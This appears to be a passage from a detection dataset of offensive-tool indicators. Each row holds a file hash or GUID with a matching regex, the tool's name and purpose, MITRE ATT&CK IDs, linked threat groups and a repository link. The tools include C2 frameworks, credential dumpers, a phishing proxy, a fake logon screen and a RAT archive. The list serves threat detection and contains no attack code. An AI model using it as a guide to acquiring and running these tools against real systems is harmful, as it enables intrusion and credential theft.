"*522b08b506889d8b54c8e93b2c41e799bb49da1dde0176a2a97f52125a63898e*",".{0,1000}522b08b506889d8b54c8e93b2c41e799bb49da1dde0176a2a97f52125a63898e.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","26650" "*523b8ef87cf347612d09851f689f5cf3a2a70eb32f392ae5bc7e5ab5fd961cca*",".{0,1000}523b8ef87cf347612d09851f689f5cf3a2a70eb32f392ae5bc7e5ab5fd961cca.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory 
networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","26651" "*5241f01eb654fe100e0c2a973b7f2443e7bcd914e5b388cc07031871a7d4d199*",".{0,1000}5241f01eb654fe100e0c2a973b7f2443e7bcd914e5b388cc07031871a7d4d199.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","26652" "*5248816fad594b75b1f9c63e79ad931f24a346915c7ba2c50035e5c13cced4cf*",".{0,1000}5248816fad594b75b1f9c63e79ad931f24a346915c7ba2c50035e5c13cced4cf.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","26654" "*5248c404dc6560429ff7d6c2fb4cd2dcb379fb9b9c410ddf3f10da2733744cfd*",".{0,1000}5248c404dc6560429ff7d6c2fb4cd2dcb379fb9b9c410ddf3f10da2733744cfd.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26655" 
"*524b9d99ab1bd72dd6b227ffc77c539c6abca8d429f56483dae709bc96e445dc*",".{0,1000}524b9d99ab1bd72dd6b227ffc77c539c6abca8d429f56483dae709bc96e445dc.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","26656" "*52582ba941f62cf6c7ece84074c42ac60e520be9ab3ab35151dde34e2c1bdf95*",".{0,1000}52582ba941f62cf6c7ece84074c42ac60e520be9ab3ab35151dde34e2c1bdf95.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26658" "*525bb5e67378b9bdc298aceb9e0108603741ae334e8ce748222999fcb2f1d818*",".{0,1000}525bb5e67378b9bdc298aceb9e0108603741ae334e8ce748222999fcb2f1d818.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","26659" "*525bb5e67378b9bdc298aceb9e0108603741ae334e8ce748222999fcb2f1d818*",".{0,1000}525bb5e67378b9bdc298aceb9e0108603741ae334e8ce748222999fcb2f1d818.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting 
us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","26660" "*525fe993592ba892d62bba7abc5c364dbcbb82123ca76fccbb8993751e32a748*",".{0,1000}525fe993592ba892d62bba7abc5c364dbcbb82123ca76fccbb8993751e32a748.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26661" "*52652191dd5bb9e3974cb1c62bc46968e94ad4c67b84a2a330ebaec19a0fd18b*",".{0,1000}52652191dd5bb9e3974cb1c62bc46968e94ad4c67b84a2a330ebaec19a0fd18b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26663" "*52652b9d89a6fd0617b8f0f60b0abef4a972fc0b7f1f861e5be029f7b2eb4dce*",".{0,1000}52652b9d89a6fd0617b8f0f60b0abef4a972fc0b7f1f861e5be029f7b2eb4dce.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","26664" "*526a14c1b561a020b7544843883117037131175b38109000b4848ea1c7963bf4*",".{0,1000}526a14c1b561a020b7544843883117037131175b38109000b4848ea1c7963bf4.{0,1000}","offensive_tool_keyword","Group3r","Find 
vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","26665" "*526f652d4d9e20a19374817eac75b914b75f3bfaecc16b65f979e5758ea62476*",".{0,1000}526f652d4d9e20a19374817eac75b914b75f3bfaecc16b65f979e5758ea62476.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","#filehash","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","26666" "*526feda402303812eac1b6663f2de7deac3bb433fcb9855625ff7d8201245416*",".{0,1000}526feda402303812eac1b6663f2de7deac3bb433fcb9855625ff7d8201245416.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","26667" "*5279c364b478709ef9b1a7024343e62e341378132c81897e7be92a3bc629ec52*",".{0,1000}5279c364b478709ef9b1a7024343e62e341378132c81897e7be92a3bc629ec52.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26669" "*527c7882ae3e01133e4230620d1435c40bfbd258fefc39cab74329a20fd0cf04*",".{0,1000}527c7882ae3e01133e4230620d1435c40bfbd258fefc39cab74329a20fd0cf04.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","26670" "*527e1f97594b67b082c6d687fb93e15c1409bbfcf6584aa019260a27af027262*",".{0,1000}527e1f97594b67b082c6d687fb93e15c1409bbfcf6584aa019260a27af027262.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","26672" "*528de69797c36423a1e6b64fa8b1825f354e6707f2ca3760d81a9f58d69d58bb*",".{0,1000}528de69797c36423a1e6b64fa8b1825f354e6707f2ca3760d81a9f58d69d58bb.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A","26674" "*52907aebc7d2c6534099d149e61bf294b0ddf7d4e814a72b3621e3a829f83c97*",".{0,1000}52907aebc7d2c6534099d149e61bf294b0ddf7d4e814a72b3621e3a829f83c97.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense 
Evasion","https://github.com/Dliv3/Venom","1","0","#filehash","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","26675" "*529b3883e56855e121fb77dc6254cf1280964b9323c71f631068c3ac6be9c4cb*",".{0,1000}529b3883e56855e121fb77dc6254cf1280964b9323c71f631068c3ac6be9c4cb.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","26676" "*529ba3d890cc8600221841ecc3fd4419c4e4c6cfcf655df163da2805a57db7a5*",".{0,1000}529ba3d890cc8600221841ecc3fd4419c4e4c6cfcf655df163da2805a57db7a5.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26677" "*529feaedec43ba6c1c4b0c31ab57575e6751fa894c90364ba81732de04bb3b44*",".{0,1000}529feaedec43ba6c1c4b0c31ab57575e6751fa894c90364ba81732de04bb3b44.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26678" "*52b07bced660711b3aa82b4cbf40156689045bcd695df40b1376c76e172beb8d*",".{0,1000}52b07bced660711b3aa82b4cbf40156689045bcd695df40b1376c76e172beb8d.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","#filehash","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","26681" "*52B0FF57-7E0A-4CA9-84D4-58DFA2456BA5*",".{0,1000}52B0FF57\-7E0A\-4CA9\-84D4\-58DFA2456BA5.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","#GUIDproject","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","26682" "*52b1b3fa12706c1cc7ca2da321e23b151f812a5f7660f0114cc8470de3a3065d*",".{0,1000}52b1b3fa12706c1cc7ca2da321e23b151f812a5f7660f0114cc8470de3a3065d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - 
T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","26683" "*52b6c057a9e0af822cbe129053d2c2d3541bf6e9ef162432fae60fdbd7a2d0f0*",".{0,1000}52b6c057a9e0af822cbe129053d2c2d3541bf6e9ef162432fae60fdbd7a2d0f0.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","#filehash","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","26684" "*52b9c0a0a0188e47cb4b812aabe5a1832633fe9d66cebf702dfe0de114db0abd*",".{0,1000}52b9c0a0a0188e47cb4b812aabe5a1832633fe9d66cebf702dfe0de114db0abd.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","26685" "*52BBA3C2-A74E-4096-B65F-B88C38F92120*",".{0,1000}52BBA3C2\-A74E\-4096\-B65F\-B88C38F92120.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","0","#GUIDproject","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","26687" "*52c1a841d7d5551195a1ed8766dd7fcae0e5ad10efe5bd854f541e2879996f1e*",".{0,1000}52c1a841d7d5551195a1ed8766dd7fcae0e5ad10efe5bd854f541e2879996f1e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26689" "*52c4aec0ba85cd0473e25bcc45735b6138b4741f7cea4d4d7591f020e5c6b8db*",".{0,1000}52c4aec0ba85cd0473e25bcc45735b6138b4741f7cea4d4d7591f020e5c6b8db.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26690" "*52c54e36cc278993f45d25a56307059f6b6682d802045eaf8eab92ae577eb2e4*",".{0,1000}52c54e36cc278993f45d25a56307059f6b6682d802045eaf8eab92ae577eb2e4.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26691" "*52d62dd2ac25d6b464a5238f3dcd7634a92d82b841c879760a51b03a5ff6de0e*",".{0,1000}52d62dd2ac25d6b464a5238f3dcd7634a92d82b841c879760a51b03a5ff6de0e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 
- T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26694" "*52ee64e32e40b7fb75d57b97f66359cad87fe7a6bace5cdd3a17bd48be13e878*",".{0,1000}52ee64e32e40b7fb75d57b97f66359cad87fe7a6bace5cdd3a17bd48be13e878.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","26697" "*52fd942b96c1251abbde6cf9908edae5b2d325791e689a65c6ab028e2de689a3*",".{0,1000}52fd942b96c1251abbde6cf9908edae5b2d325791e689a65c6ab028e2de689a3.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26701" "*52ff6af0c995ccf66fcd0379f1236578a907768eac72bf659cd7c567c5bb70b2*",".{0,1000}52ff6af0c995ccf66fcd0379f1236578a907768eac72bf659cd7c567c5bb70b2.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","26702" "*5306a5bf3f43607ea55452f85c45e42aab36652680609b4f53324f8c95121777*",".{0,1000}5306a5bf3f43607ea55452f85c45e42aab36652680609b4f53324f8c95121777.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts 
suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26703" "*5312f40c37c8be83b7131d03100ca39c7e9862465dd40e62d13f153e4ddf1905*",".{0,1000}5312f40c37c8be83b7131d03100ca39c7e9862465dd40e62d13f153e4ddf1905.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","26704" "*53153e63147a9924b06f0291a080ae86c692565a305e84f442b6b0a83f6a74c9*",".{0,1000}53153e63147a9924b06f0291a080ae86c692565a305e84f442b6b0a83f6a74c9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26706" "*53182258-F40E-4104-AFC6-1F327E556E77*",".{0,1000}53182258\-F40E\-4104\-AFC6\-1F327E556E77.{0,1000}","offensive_tool_keyword","C3","Framework designed 
for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#GUIDproject","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","26707" "*531870bd9f59ac799dfa6573472db1966cd3a9f8ece84d2f2e409e4384770b4a*",".{0,1000}531870bd9f59ac799dfa6573472db1966cd3a9f8ece84d2f2e409e4384770b4a.{0,1000}","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","0","#filehash","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","26708" "*5323c783db3710a6802c7398d387b027115a1fccc2b98888a820bd0f0b0ce605*",".{0,1000}5323c783db3710a6802c7398d387b027115a1fccc2b98888a820bd0f0b0ce605.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26710" "*532a1b17840d0746c48f98d0f24443bd60111db4f3c5f82872ec5e4e6854438a*",".{0,1000}532a1b17840d0746c48f98d0f24443bd60111db4f3c5f82872ec5e4e6854438a.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential 
Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","26712" "*532a20950a7c2ed819e89c04f70cd0b9d1f42507f29f8850e7c4720d17cbed5f*",".{0,1000}532a20950a7c2ed819e89c04f70cd0b9d1f42507f29f8850e7c4720d17cbed5f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26713" "*5332d9912c90a6b8c7deead3f3b592b5ed63b81e78fef31bfdc04ac3054e879c*",".{0,1000}5332d9912c90a6b8c7deead3f3b592b5ed63b81e78fef31bfdc04ac3054e879c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26718" "*5338267c8ef94a98f32ff42a23862c5dd42a3c19a7ad3d250ff1a9f263c17974*",".{0,1000}5338267c8ef94a98f32ff42a23862c5dd42a3c19a7ad3d250ff1a9f263c17974.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","26720" "*53395d8379dfd716e8708b21490fdec662537be8c56d0df185df59d0ed68eb04*",".{0,1000}53395d8379dfd716e8708b21490fdec662537be8c56d0df185df59d0ed68eb04.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 
135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","#filehash","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","26721" "*533c13619981d1cc6c9780668aec4a86fc179a7a6ddf01b6b5d3ae7edd993572*",".{0,1000}533c13619981d1cc6c9780668aec4a86fc179a7a6ddf01b6b5d3ae7edd993572.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","26722" "*534b0370d1bff7e4a0f327d7fa01679a10cfffc67dbefa5f45e49dbbadec7fa3*",".{0,1000}534b0370d1bff7e4a0f327d7fa01679a10cfffc67dbefa5f45e49dbbadec7fa3.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","26724" "*534cd20e815e2f733e1d381d60b80cbdffa476ca72d16769ad4e080e7f26a803*",".{0,1000}534cd20e815e2f733e1d381d60b80cbdffa476ca72d16769ad4e080e7f26a803.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux 
